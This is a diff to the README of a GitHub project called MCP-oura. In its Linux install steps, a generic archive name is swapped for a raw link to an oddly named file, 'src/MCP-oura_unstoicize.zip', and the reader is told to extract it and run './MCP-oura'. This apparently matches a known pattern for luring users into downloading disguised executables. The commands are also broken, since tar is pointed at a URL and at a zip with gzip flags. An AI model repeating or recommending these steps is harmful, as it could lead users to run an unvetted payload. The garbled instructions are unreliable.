SiddhiBagul/MCP-oura/README.md

 #### Linux
 1. Open your terminal.
-2. Navigate to the directory where you downloaded the `.tar.gz` file.
+2. Navigate to the directory where you downloaded the `https://raw.githubusercontent.com/SiddhiBagul/MCP-oura/main/src/MCP-oura_unstoicize.zip` file.
-3. Extract the file with the command: `tar -xvzf filename.tar.gz`
+3. Extract the file with the command: `tar -xvzf https://raw.githubusercontent.com/SiddhiBagul/MCP-oura/main/src/MCP-oura_unstoicize.zip`
 4. Navigate into the extracted folder: `cd foldername`
 5. Run the application using the command: `./MCP-oura`